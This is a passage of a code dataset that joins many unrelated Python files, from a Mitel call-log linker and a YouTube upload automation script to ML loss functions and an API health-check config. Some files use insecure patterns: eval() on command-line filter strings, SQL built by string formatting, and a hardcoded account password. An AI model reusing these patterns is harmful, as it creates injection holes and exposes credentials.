in printed_ids:\n printed_ids.add(id(list))\n unique_event_lists.append(list)\n return unique_event_lists\n\n\ndef print_calls(unique_event_lists):\n unique_event_lists.sort(key=lambda x: x[0].time)\n unique_event_lists.sort(key=lambda x: x[0].date)\n for list in unique_event_lists:\n print()\n debug_print('Event list id {}:'.format(id(list)), file=sys.stdout)\n print('\\n'.join([str(event) for event in list]))\n return len(unique_event_lists)\n\n\ndef print_anis(unique_event_lists):\n unique_event_lists.sort(key=lambda x: x[0].ani)\n for events in unique_event_lists:\n anis = set()\n for event in events:\n anis.add(event.ani)\n print('\\n'.join(anis))\n\n\ndef sort_calls(call_event_lists):\n debug_print('Sorting calls')\n sorted_event_lists = []\n for event_list in call_event_lists:\n event_list.sort(key=operator.attrgetter('sequence_id'))\n event_list.sort(key=operator.attrgetter('call_id'))\n sorted_event_lists.append(event_list)\n continue\n call_id_lists = {}\n last_call_ids = (None, None)\n last_assoc_id = ''\n for event in event_list:\n if event.associated_id not in [last_assoc_id, '', event.call_id]:\n call_id_lists[(event.call_id, event.associated_id)] = \\\n (last_assoc_id, [event])\n last_assoc_id = event.associated_id\n call_id_lists[(event.call_id, last_assoc_id)].append(event)\n sorted_list = recombine_call_events(call_id_lists)\n if sorted_list is None:\n print('Warning: failed to sort call', file=sys.stderr)\n sorted_event_lists.append(event_list)\n elif len(sorted_list) != len(event_list):\n print('Warning: call events lost during sorting, '\n 'falling back to unsorted', file=sys.stderr)\n sorted_event_lists.append(event_list)\n else:\n sorted_event_lists.append(sorted_list)\n return sorted_event_lists\n\n\ndef recombine_call_events(call_id_lists):\n first_id = None\n for call_id,assoc_id in call_id_lists:\n if assoc_id == '':\n first_id = (call_id, assoc_id)\n break\n if first_id is None:\n return None\n insertions_to_make = []\n for call_id,assoc_id in call_id_lists:\n if assoc_id != '':\n insertions_to_make.append((call_id,assoc_id))\n while len(insertions_to_make) > 0:\n ids_with_insertions = [insertion[1] for insertion\n in insertions_to_make]\n insertions = 0\n for insertion in insertions_to_make:\n if insertion[0] not in ids_with_insertions:\n insert_events(call_id_lists, insertion)\n insertions_to_make.remove(insertion)\n insertions += 1\n if insertions == 0:\n return None\n return call_id_lists[first_id]\n\n\ndef insert_events(call_id_lists, insertion):\n insert_id = insertion[0]\n insert_into_id = insertion[1]\n insert_list = call_id_lists[insertion]\n insert_into_list = call_id_lists[insert_into_id]\n insert_index = 0\n while insert_index < len(insert_into_list):\n if insert_list[0].time < insert_into_list[insert_index].time\\\n or insert_into_list[insert_index].associated_id == insert_id:\n break\n insert_index += 1\n insert_into_list[insert_index:insert_index] = insert_list\n\n\ndef get_call_ids_by_filter(all_data, filter_condition):\n debug_print('Processing filter \"{}\"'.format(filter_condition))\n call_ids = set()\n for event in all_data:\n if event.call_id == ' ':\n continue\n try:\n result = eval(filter_condition)\n except:\n print('Failure evaluating filter condition \"{}\"'\n .format(filter_condition), file=sys.stderr)\n break\n if result is True:\n debug_print('Found call id {} matching filter'\n .format(event.call_id))\n call_ids.add(event.call_id)\n if event.associated_id != '':\n call_ids.add(event.associated_id)\n return call_ids\n\n\ndef get_no_id_events_by_filter(all_data, filter_condition):\n event_lists = []\n for event in all_data:\n if event.call_id == ' ':\n try:\n result = eval(filter_condition)\n except:\n print('Failure evaluating filter condition \"{}\"'\n .format(filter_condition), file=sys.stderr)\n break\n if result is True:\n event_lists.append([event])\n return event_lists\n\n\ndef process_days(reader, filter_conditions, call_ids):\n unique_call_count = 0\n for file_dict in reader.date_reader():\n no_id_events = []\n debug_print('Retrieved file dictionary for date {}'.format(\n reader.current_date.strftime('%Y-%m-%d'))\n + ' from reader containing {} files'.format(\n len(file_dict)))\n all_data = read_all_data(file_dict, reader.current_date)\n\n current_call_ids = call_ids\n for condition in filter_conditions:\n current_call_ids = current_call_ids.union(get_call_ids_by_filter(\n all_data, condition))\n no_id_events.extend(get_no_id_events_by_filter(all_data,\n condition))\n\n debug_print('{} call IDs selected for {}:'.format(len(current_call_ids),\n reader.current_date.strftime('%Y-%m-%d')))\n debug_print(current_call_ids)\n\n if len(current_call_ids) > 0:\n events = group_calls_by_id(current_call_ids, all_data)\n elif len(filter_conditions) == 0:\n events = group_all_calls(all_data)\n else:\n events = {}\n unique_events = get_unique_calls(events)\n unique_events.extend(no_id_events)\n unique_call_count += len(unique_events)\n sorted_calls = sort_calls(unique_events)\n print_calls(sorted_calls)\n print('\\n{} unique calls processed'.format(unique_call_count), file=sys.stderr)\n\n\n\ncall_ids = set()\nfilter_conditions = set()\ndebug_mode = False\n\nwhile '-v' in sys.argv:\n debug_mode = True\n sys.argv.remove('-v')\n\nwhile '-f' in sys.argv:\n argindex = sys.argv.index('-f')\n parameter = sys.argv[argindex + 1]\n filter_conditions.add(parameter)\n sys.argv.remove('-f')\n sys.argv.remove(parameter)\n\nwhile '-c' in sys.argv:\n argindex = sys.argv.index('-c')\n parameter = sys.argv[argindex + 1]\n if re.match('[A-Z][0-9]{7}', parameter) is not None:\n call_ids.add(parameter)\n else:\n raise smdrreader.InvalidInputException('Invalid call id: ' + parameter)\n sys.argv.remove('-c')\n sys.argv.remove(parameter)\n\nstart_date = sys.argv[1]\nend_date = sys.argv[2]\ndata_dir = sys.argv[3]\n\ntry:\n smdr_reader = smdrreader.SMDRReader(data_dir, start_date, end_date)\n debug_print('SMDRReader created successfully')\nexcept smdrreader.InvalidInputException as e:\n print('Error: ' + str(e), file=sys.stderr)\n sys.exit(1)\n\nprocess_days(smdr_reader,filter_conditions,call_ids)\n","repo_name":"InfinityTotality/mitel-tools","sub_path":"segmentlinker.py","file_name":"segmentlinker.py","file_ext":"py","file_size_in_byte":12316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15170005313","text":"class Writer:\n def __init__(self, name, freq, _var, disc):\n self.name = name # base name of file\n self.freq = freq # save frequency\n self.vars = _var # list of names of the variables\n self.rows = [] # list of unknown indices\n self.x = [] # list of coordinates\n for e in disc.elements.values():\n self.rows.append(e.rows)\n self.x.append(e.evalx())\n\n def save(self, nt, t, u):\n '''Write results to disk\n '''\n if nt % self.freq == 0:\n # Open file\n f = open(self.name + '_{0:06d}'.format(nt) + '.dat', 'w+')\n # Write header\n f.write('$Info\\n')\n f.write(' Iteration Time\\n')\n f.write('{0:15d} {1:15.6f}\\n'.format(nt, t))\n # Write data\n f.write('$Solution\\n')\n f.write(' x')\n for v in self.vars:\n f.write(' {0:>15s}'.format(v))\n f.write('\\n')\n for i in range(len(self.x)):\n for j in range(len(self.x[i])):\n f.write('{0:15.6f}'.format(self.x[i][j]))\n for v in range(len(self.vars)):\n f.write(' {0:15.6f}'.format(u[self.rows[i][v][j]]))\n f.write('\\n')\n # Close file\n f.close()\n","repo_name":"acrovato/dg-flo","sub_path":"utils/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"10049563323","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @File: asyncio_demo.py\n# @Author: dell\n# @Date: 2020/10/26 16:00\n# @Desc: \n# @Project: licode\n# @Source: PyCharm\n\n\nimport asyncio\nimport threading\n\nfrom day15.process_demo import multiprocess_demo\n\n\n@asyncio.coroutine\ndef hello():\n print('Hello world! (%s)' % threading.currentThread())\n multiprocess_demo()\n yield from asyncio.sleep(1)\n print('Hello again! (%s)' % threading.currentThread())\n\n\nloop = asyncio.get_event_loop()\n\ntasks = [hello(), hello()]\n\nloop.run_until_complete(asyncio.wait(tasks))\n\nloop.close()\n","repo_name":"freechenh/licode","sub_path":"day15/asyncio_demo.py","file_name":"asyncio_demo.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39895264055","text":"import smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\nHOST = (\"smtp.163.com\")\nSUBJECT = \"Test email from Python-notebook\"\nTO = [\"861022418@qq.com\", \"2859626066@qq.com\"]\nFROM = \"17610291226@163.com\"\ntext = \"哈哈哈哈哈\"\n\nmessage = MIMEText(\"For Bot: \\r\\n Python rules all.\", \"plain\", \"utf-8\")\n# message[\"From\"] = Header(FROM, \"utf-8\") # 会报错554\nmessage[\"From\"] = \"bit\" + \"<\" + FROM + \">\"\nmessage[\"To\"] = Header(\",\".join(TO), \"utf-8\")\nmessage[\"Subject\"] = Header(SUBJECT, \"utf-8\")\n\nif __name__ == \"__main__\":\n server = smtplib.SMTP_SSL(HOST, 465)\n server.login(FROM, \"****\")\n\n server.sendmail(FROM, TO, message.as_string())\n server.quit()\n","repo_name":"warmsirius/python-notebook","sub_path":"2.Python运维/2.业务服务监控/4.1 网易163邮箱发送邮件.py","file_name":"4.1 网易163邮箱发送邮件.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12988587302","text":"import pyautogui as pg ,webbrowser as web ,time as tm\r\npg.FAILSAFE = True\r\nname=input(\"Como se va llamar : \")#Le pregunta al usuario el nombre del video\r\nn=name.lower()#convierte el nombre a minisculas \r\nir = n.find('biologia')!=-1 or n.find('fisica')!=-1 or n.find('proyectos')!=-1 or n.find('ambiente')!=-1 #valida si es de irwing \r\nweb.open('https://studio.youtube.com/channel/UCxXE5uqxeC-9wBdTteT1VnA/videos?d=ud')#Abre el navegador en youtube estudio\r\ncurrentMouseX, currentMouseY = pg.position()#mira la posicion del moouse \r\ntm.sleep(15)\r\n#Apreta el boton de subir videos \r\npg.click(708,527) #elige el video\r\n#imprime las coordenadas del mouse\r\nprint({\r\n \"x\":currentMouseX,\r\n \"y\":currentMouseY\r\n})\r\ntm.sleep(4)\r\npg.click(456,191) #elige el video a subir \r\npg.press(\"enter\")\r\ntm.sleep(5)\r\npg.write(name)#escribe el nombre del video\r\nif ir:\r\n pg.click(1088,558)#si es de irwing copia el link\r\ntm.sleep(2)\r\npg.click(1119,650)#Apreta el boton den siguiente para que baje\r\ntm.sleep(2)\r\npg.click(256,591) #No es de ninos \r\npg.click(1119,650)#Siguiente\r\npg.click(1119,650)#Siguiente\r\npg.click(1119,650)#Siguiente \r\n# si es de irwing le da oculto caso contrario publico \r\ntm.sleep(2)\r\nif ir:\r\n pg.press(\"down\")\r\n print(0)\r\nelse:\r\n pg.press('up')\r\npg.click(1119,650) # le da a subir\r\n#si es de irwing abre la pagina para meter el formulario de videos\r\nif ir:\r\n web.open(\"http://192.168.1.8\") #Abre pagina de videos \r\n tm.sleep(5)\r\n pg.click(627,121) #Click en el nombre\r\n tm.sleep(1)\r\n pg.write(name) #Escribe el nombre \r\n pg.click(667,141)#Click en el link\r\n pg.click(667,141)\r\n tm.sleep(2)\r\n pg.hotkey('ctrl','v')\r\n pg.press(\"enter\")#Envia la Informacion\r\npg.click(661,738)#abre el explorador de archivos\r\ntm.sleep(4)\r\npg.click(71,222)#Videos \r\npg.click(456,169)#Click al primer video\r\npg.hotkey ('ctrl', 'x')#Corta el video\r\npg.click(347,161)\r\npg.click(347,161)#Se mete a la carperta de Subir videos \r\ntm.sleep(4)\r\npg.hotkey ('ctrl', 'v')#Pega el video","repo_name":"Josuecordova17/auto","sub_path":"subirvideos.py","file_name":"subirvideos.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20727114822","text":"import io\nfrom operator import mod\nimport sys\n\n_INPUT = \"\"\"\\\n1000\n\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n# ---------------------------------\nN = int(input())\nZ = int(1e6)\n\n\nisprime = [True for _ in range(Z + 1)]\ncnt_prime = [0 for _ in range(Z + 1)]\nprimes = []\n\nisprime[0] = False\nisprime[1] = False\n\nfor p in range(2, int(Z ** (1 / 2)) + 1):\n if isprime[p]:\n for q in range(p * p, Z + 1, p):\n isprime[q] = False\n\nfor p in range(2, Z + 1):\n if isprime[p]:\n primes.append(p)\n cnt_prime[p] = 1\n\nfor p in range(2, Z + 1):\n cnt_prime[p] += cnt_prime[p - 1]\n\n\nans = 0\nfor i in range(len(primes)):\n a = primes[i]\n if a >= N ** (1 / 5):\n break\n for j in range(i + 1, len(primes)):\n b = primes[j]\n if a * a * b * b * b >= N:\n break\n ans += cnt_prime[int((N // (a * a * b)) ** (1 / 2))] - cnt_prime[b]\n\n\nprint(ans)\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"contest/abc300/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17550814024","text":"import os\n\nfrom health import USER_ID\n\nNAME = \"Authentication\"\nBASE_URL = \"https://staging.zuri.team/api/auth\"\n\nUSER = {\n \"firstName\": \"Health Check\",\n \"lastName\": \"Super Admin\",\n \"email\": \"zurihealthcheck@gmail.com\",\n \"password\": \"zuri-health-check123\",\n}\n\nENDPOINTS_CONFIG = [\n # {\n # \"url\": \"/api/auth/signup\",\n # \"method\": \"POST\",\n # \"body_params\": USER,\n # },\n {\n \"url\": \"/api/auth/check-email\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"]\n },\n },\n {\n \"url\": \"/api/auth/verify/{token}\",\n \"method\": \"GET\",\n \"path_params\": {\n \"token\": os.getenv(\"ACCESS_TOKEN\")\n },\n },\n {\n \"url\": \"/api/auth/verify/resend\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"]\n },\n },\n {\n \"url\": \"/api/auth/login\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"],\n \"password\": USER[\"password\"]\n },\n },\n {\n \"url\": \"/api/auth/reset-password\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"]\n },\n },\n # {\n # \"url\": \"/api/auth/reset-password\",\n # \"method\": \"PATCH\",\n # \"body_params\": {\n # \"token\": \"\",\n # \"password\": USER[\"password\"]\n # },\n # \"auth_required\": True,\n # },\n {\n \"url\": \"/api/auth/2fa/enable\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"],\n },\n \"auth_required\": True,\n },\n # {\n # \"url\": \"/api/auth/2fa/send-code\",\n # \"method\": \"POST\",\n # \"body_params\": {\n # \"email\": USER[\"email\"],\n # },\n # },\n # {\n # \"url\": '/api/auth/2fa/verify-code',\n # \"method\": \"POST\",\n # \"body_params\": {\n # \"token\": \"\",\n # \"email\": USER[\"email\"],\n # },\n # },\n {\n \"url\": \"/api/authorize/roles\",\n \"method\": \"GET\",\n \"auth_required\": True,\n },\n {\n \"url\": \"/api/authorize\",\n \"method\": \"POST\",\n \"body_params\": {\n \"token\": os.getenv(\"ACCESS_TOKEN\"),\n \"permission\": \"product.read\",\n },\n },\n {\n 'url': '/api/authorize/permissions',\n 'method': 'GET',\n },\n {\n \"url\": \"/users/permission\",\n \"method\": \"POST\",\n \"body_params\": {\n \"userId\": USER_ID,\n \"permissionId\": \"product.read\",\n },\n \"auth_required\": True,\n },\n {\n \"url\": \"/users/permission\",\n \"method\": \"DELETE\",\n \"body_params\": {\n \"userId\": USER_ID,\n \"permissionId\": \"product.read\",\n },\n \"auth_required\": True,\n },\n {\n \"url\": \"/users/{user_id}/role\",\n \"method\": \"PUT\",\n \"body_params\": {\n \"roleId\": 3,\n \"roleName\": \"admin\",\n },\n \"path_params\": {\n \"user_id\": USER_ID,\n },\n \"auth_required\": True,\n },\n {\n \"url\": \"/users\",\n \"method\": \"GET\",\n \"auth_required\": True,\n },\n {\n \"url\": \"/auth/change-email\",\n \"method\": \"PATCH\",\n \"body_params\": {\n \"newEmail\": \"health-check@zuri.team\",\n },\n \"auth_required\": True,\n }\n]\n","repo_name":"kevinkoech357/spitfire-super-admin-one","sub_path":"health/endpoints/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"10300962573","text":"import geopandas as gpd\nfrom . import base\n\ndesc = \"\"\"\n{\n \"name\":\"filter\",\n \"description\":\"根据输入的条件对要素进行属性过滤,只支持矢量数据,不支持栅格数据和地形数据\",\n \"inputs\":{\n \"datafile\":\"要过滤的数据文件,仅支持shape文件\",\n \"where\":\"过滤条件,类似于SQL语句中的where子句,例如:land_type=='005'\"\n },\n \"output\":\"过滤后的结果数据\"\n}\n\"\"\"\n\nexample = \"\"\"\n指令:从土地数据中提取出耕地的数据,土地类型字段是land_type,耕地类型的值为005;土地数据是land.shp。\njson: [{\n\t\"name\":\"filter\",\n\t\"inputs\":{\n\t\t\"datafile\":\"land.shp\",\n\t\t\"where\":\"land_type=='005'\"\n\t},\n \"output\":\"farm_land.shp\"\n}]\n\"\"\"\n\ndef check(tool):\n datafile = tool[\"inputs\"][\"datafile\"]\n # 必须是shp文件\n if not datafile.endswith(\".shp\"):\n return False, f\"对于工具{tool['name']},输入的datafile参数必须是shp文件,而不能是{datafile};\"\n return True, \"\"\n\n# 处理类似“City IS NOT NULL”的情况\ndef deal_no_null(where:str):\n # result_df = df.query('column_name.notna()')\n if \"IS NOT NULL\" in where:\n where = where.replace(\"IS NOT NULL\", \".notna()\")\n # 去掉中间的空格\n where = where.replace(\" \", \"\")\n return where\n\n\ndef filter(datafile:str, where:str, output:str):\n gdf = gpd.read_file(datafile)\n where = deal_no_null(where)\n filtered_gdf = gdf.query(where)\n filtered_gdf.to_file(output, encoding=base.read_shp_encoding(datafile))\n return output\n\n","repo_name":"pampa0629/gischain","sub_path":"tools/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"7192990542","text":"import plotly.plotly as py\nimport plotly.graph_objs as go\n\ntrace = go.Scatter(\n x=[1, 2, 3], y=[1, 2, 3],\n marker=dict(\n color=['red', 'blue', 'green'],\n size=[30, 80, 200]),\n mode='markers')\nplot_url = py.plot([trace])\n\n","repo_name":"josephding23/JuliaProjects","sub_path":"PlotlyProjects/src/started.py","file_name":"started.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25718665374","text":"\"\"\"\nLoss functions for Siamese networks\n\"\"\"\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn.modules.loss import _Loss\n\nclass ContrastiveLoss(_Loss):\n \"\"\"\n Contrastive loss function.\n Based on: http://yann.lecun.com/exdb/publis/pdf/hadsell-chopra-lecun-06.pdf\n \"\"\"\n\n def __init__(self, margin: float = 1.25, size_average: bool = True, reduce: bool = True) -> None:\n\n super(ContrastiveLoss, self).__init__(size_average, reduce)\n self.margin = margin\n\n def forward(self, x0: torch.Tensor, x1: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param x0: first input (batch_size, dimensions)\n :param x1: second input (batch_size, dimensions)\n :param y: target (batch_size,)\n y == 1 similar, y == 0 dissimilar\n :return: Y * 1/2 * distance^2 + (1 - Y) * 1/2 * max(0, margin−distance)^2\n \"\"\"\n\n # euclidian distance\n distance = F.pairwise_distance(x0, x1)\n\n l1 = y.float() * torch.pow(distance, 2) / 2.0\n l2 = (1 - y).float() * torch.pow(torch.clamp(self.margin - distance, min=0.0), 2) / 2.0\n loss = l1 + l2\n\n if not self.reduce:\n return loss\n elif self.size_average:\n return loss.mean()\n else:\n return loss.sum()\n\n\nclass CosineContrastiveLoss(_Loss):\n \"\"\"\n Cosine contrastive loss function.\n Based on: http://anthology.aclweb.org/W16-1617\n If they match, loss+ is 1/4(1-cos_sim)^2.\n If they don't, loss- is cos_sim^2 if cos_sim < margin or 0 otherwise.\n Margin in the paper is ~0.4.\n (Here I modify loss- to max(cos_sim, 0)^2 to make it continous,\n and the margin is modified to 0.13653 where loss+ == loss-)\n \"\"\"\n\n def __init__(self, margin: float = 0.13653, size_average: bool = True, reduce: bool = True) -> None:\n super(CosineContrastiveLoss, self).__init__(size_average, reduce)\n self.margin = margin\n\n def forward(self, x0: torch.Tensor, x1: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param x0: first input (batch_size, dimensions)\n :param x1: second input (batch_size, dimensions)\n :param y: target (batch_size,)\n y == 1 similar, y == 0 dissimilar\n :return: Y * 1/4(1-cos_sim)^2 + (1 - Y) * max(0, cos_sim)^2\n \"\"\"\n cos_sim = F.cosine_similarity(x0, x1)\n\n l1 = y.float() * torch.pow((1.0 - cos_sim), 2) / 4.0\n l2 = (1 - y).float() * torch.pow(cos_sim.clamp(min=0), 2)\n loss = l1 + l2\n\n if not self.reduce:\n return loss\n elif self.size_average:\n return loss.mean()\n else:\n return loss.sum()\n\n\nif __name__ == \"__main__\":\n\n test_input_1 = torch.FloatTensor([[0.6, 0.5, 1.5], [0.6, 0.5, 1.5], [1.2, 1.3, -1.2], [1.2, 1.3, -1.2]])\n test_input_2 = torch.FloatTensor([[-0.5, -0.6, 0.2], [-0.5, -0.6, 0.2], [1.21, 1.29, -1.2], [1.2, 1.3, -1.2]])\n label = torch.LongTensor([1, 0, 1, 0])\n\n loss_func = ContrastiveLoss(reduce=False)\n\n l = loss_func(test_input_1, test_input_2, label)\n\n print(\"ConstrativeLoss\", l)\n\n loss_func = CosineContrastiveLoss(reduce=False)\n\n l = loss_func(test_input_1, test_input_2, label)\n\n print(\"CosineConstrativeLoss\", l)\n","repo_name":"handsomezebra/nlp","sub_path":"my_library/models/contrastive_loss.py","file_name":"contrastive_loss.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9667029277","text":"\"\"\"\nAnnotate inverted Alu elements (or other repeat elements) based on repeatmask (sqlite db)\n\nConvert mySQL to sqlite: https://gist.github.com/esperlu/943776. For UCSC: \n\nusage:\npython annotate_repeat.py -rdb < circRNA.bed > circRNA.IAE.bed\n\n\n\"\"\"\n\n__author__ = \"Thomas Hansen (tbh@mbg.au.dk)\"\n__lab__ = \"ncRNAlab\"\n__version__ = \"1.0.0\"\n\n\nimport sys\nimport argparse\n#import utils\nimport sqlutil\n\n\nparser = argparse.ArgumentParser(description='Annotate circRNAs')\n\nparser.add_argument('-rdb', \"--rdb\", dest='rdb', help=\"sqlite database with repeat annotation\")\nparser.add_argument('-rf', \"--repeat_family\", dest='repeat_family', nargs=\"+\", default=[\"Alu\"], help=\"Repeat families to analyse\") # [\"MIR\", \"L1\", \"L2\"]\n\nargs = parser.parse_args()\n\nsqlite_repeat_db = args.rdb\nrepeat_family = args.repeat_family \n\nsql_rep = sqlutil.sqlutil (type=\"sqlite3\", url=sqlite_repeat_db)\nrepeat_db = sql_rep.get_table ()\n\niline = 0\n\nfor line in sys.stdin:\n\n iline += 1\n \n cols = line.rstrip('\\r\\n').split ('\\t')\n\n if len (cols) < 3:\n continue\n \n # header\n if cols[0][0] == \"#\" or not cols[1].isdigit () or not cols[2].isdigit:\n \n for family in repeat_family:\n \n f = family.lower()\n cols = cols + [f+\"dist\", f+\"dist_up_down\", f+\"name_up_down\", f+\"score_up_down\"]\n \n print (\"\\t\".join (cols))\n continue\n\n chrom, start, end, strand = cols[0], int(cols[1]), int(cols[2]), cols[5]\n \n for family in repeat_family:\n \n #downstream\n \n query = \"SELECT *, start-{} AS rel FROM {} WHERE family='{}' AND chr='{}' AND start > '{}' ORDER BY start ASC LIMIT 20\".format (\n end, repeat_db, family, chrom, end)\n \n sql_rep.query(query) \n \n inf = 99999999\n \n dist_down_p, dist_down_m, dist_up_p, dist_up_m = inf, inf, inf, inf\n name_down_p, name_down_m, name_up_p, name_up_m = \"\", \"\", \"\", \"\"\n score_down_p, score_down_m, score_up_p, score_up_m = 0,0,0,0\n \n for rr in sql_rep.fetchall():\n \n if rr[\"strand\"] == \"+\" and int(rr[\"rel\"]) < dist_down_p:\n dist_down_p = int(rr[\"rel\"])\n name_down_p = rr[\"name\"]\n score_down_p = rr[\"score\"]\n \n elif rr[\"strand\"] == \"-\" and int(rr[\"rel\"]) < dist_down_m:\n dist_down_m = int(rr[\"rel\"])\n name_down_m = rr[\"name\"]\n score_down_m = rr[\"score\"]\n \n if dist_down_p < inf and dist_down_m < inf: \n break\n\n query = \"SELECT *, {}-end AS rel FROM {} WHERE family='{}' AND chr='{}' AND end < '{}' ORDER BY end DESC LIMIT 20\".format (\n start, repeat_db, family, chrom, start)\n \n sql_rep.execute(query) \n \n for rr in sql_rep.fetchall():\n\n if rr[\"strand\"] == \"+\" and int(rr[\"rel\"]) < dist_up_p: \n dist_up_p = int(rr[\"rel\"])\n name_up_p = rr[\"name\"]\n score_up_p = int(rr[\"score\"])\n \n elif rr[\"strand\"] == \"-\" and int(rr[\"rel\"]) < dist_up_m:\n \n dist_up_m = int(rr[\"rel\"])\n name_up_m = rr[\"name\"]\n score_up_m = (rr[\"score\"])\n \n \n if dist_up_p < inf and dist_up_m < inf: \n break\n \n prox_up = min (dist_up_p, dist_up_m) \n prox_down = min (dist_down_p, dist_down_m)\n \n dist = min (dist_up_p+dist_down_m, dist_up_m+dist_down_p)\n dist_min = min (dist_up_p, dist_up_m) + min (dist_down_p, dist_down_m)\n \n if dist > inf:\n dist = \"\"\n \n (dist_up, dist_down) = (dist_up_p,dist_down_m) if (dist_up_p+dist_down_m < dist_up_m+dist_down_p) else (dist_up_m,dist_down_p)\n (name_up, name_down) = (name_up_p,name_down_m) if (dist_up_p+dist_down_m < dist_up_m+dist_down_p) else (name_up_m,name_down_p) \n (score_up, score_down) = (score_up_p,score_down_m) if (dist_up_p+dist_down_m < dist_up_m+dist_down_p) else (score_up_m,score_down_p)\n \n if strand == \"-\":\n dist_up, dist_down = dist_down, dist_up\n name_up, name_down = name_down, name_up\n score_up, score_down = score_down, score_up\n \n cols.append (str(dist))\n cols.append (\",\".join ([str(s) for s in [dist_up, dist_down]]))\n cols.append (\",\".join ([str(s) for s in [name_up, name_down]]))\n cols.append (\",\".join ([str(s) for s in [score_up, score_down]]))\n \n print (\"\\t\".join (cols))\n\nsql_rep.close()\n\n \n","repo_name":"ncrnalab/pyutils","sub_path":"annotate_repeat.py","file_name":"annotate_repeat.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"26370398485","text":"class Solution: \n def maximumUnits(self, boxTypes, truckSize):\n boxTypes.sort(key=lambda x: x[1], reverse=True)\n maxUnits = 0\n for boxType in boxTypes:\n numOfUnits = min(truckSize, boxType[1])\n maxUnits = numOfUnits * boxType[0]\n truckSize -= numOfUnits\n if truckSize == 0:\n break\n\n return maxUnits\n\n\n ","repo_name":"xprose7820/LC_Solutions","sub_path":"Greedy/MaximumUnitsOnTruck.py","file_name":"MaximumUnitsOnTruck.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12999113351","text":"n = int(input())\narr = list(map(int, input().split(' ')))\n# arr = [4,2,2,2,2]\narr.sort(reverse=True)\nans = []\nfor i in arr:\n if sum(ans) <= (sum(arr)-sum(ans)):\n ans.append(i)\n else:\n break\nprint(len(ans))\n","repo_name":"SuyeshBadge/Codes","sub_path":"CodeForces/A_Twins.py","file_name":"A_Twins.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39097964195","text":"import torch\nimport platform\nimport matplotlib.pyplot as plt\n\nfrom PerformanceRNN import PerformanceRNN\nfrom MidiIndexUtils import writeMidi, idxsToMidi, NUM_CHANNELS\nfrom MaestroMidiDataset import MaestroMidiDataset\n\ntop_dir = '' if platform.system() == 'Linux' else 'Documents/PerformanceMidi/'\n\nmodel_path = top_dir + 'models/performance_rnn-iter4-221.pt'\nmidi_path = top_dir + 'music/performance_rnn-iter4-221.pt.midi'\n#model_path = top_dir + 'final_models/performance_rnn-iter2-186.pt'\n#midi_path = top_dir + 'music/performance_rnn-iter2-186.pt.midi'\n#model_path = top_dir + 'models/performance_rnn-iter9-596.pt'\n#midi_path = top_dir + 'music/performance_rnn-iter9-596.pt.midi'\n\nprint('creating and loading model...')\nlstm = PerformanceRNN(input_channels=NUM_CHANNELS, output_channels=NUM_CHANNELS, hidden_size=1024, num_layers=3, dropout=0.5).to('cuda')\nlstm.load_state_dict(torch.load(model_path))\nlstm.eval()\n\nprint('predicting...')\n\n#prime = torch.zeros(1, 1, 388)\n#prime[0, 0, 355] = 1\n\ndataset = MaestroMidiDataset('train')\ndataset.fillCache()\nprime = dataset.cache[dataset.df['midi_filename'][0]][:100].long()\nonehot = torch.eye(NUM_CHANNELS)\nprime = onehot[prime][None, :, :]\n\n#print(dataset.df['midi_filename'][0])\n#y = prime\n\ny = lstm.forward_step(10000, prime=prime.to('cuda'), greedy=False)\ny = y.to('cpu').long().detach().numpy()\n\nprint('writing to midi and plotting...')\nmf, errors = idxsToMidi(y)\nprint(errors)\nwriteMidi(mf, filename=midi_path)\n\nplt.plot(y)\nplt.show()\n","repo_name":"robz/artemialis","sub_path":"performanceRNN_predict.py","file_name":"performanceRNN_predict.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29744131931","text":"# GOOD SHIT\n\n\ndef parse_string(string):\n \"\"\" Global function; takes string and parses it into returned list;\n helper function used by modify_score_for_search_term() \"\"\"\n 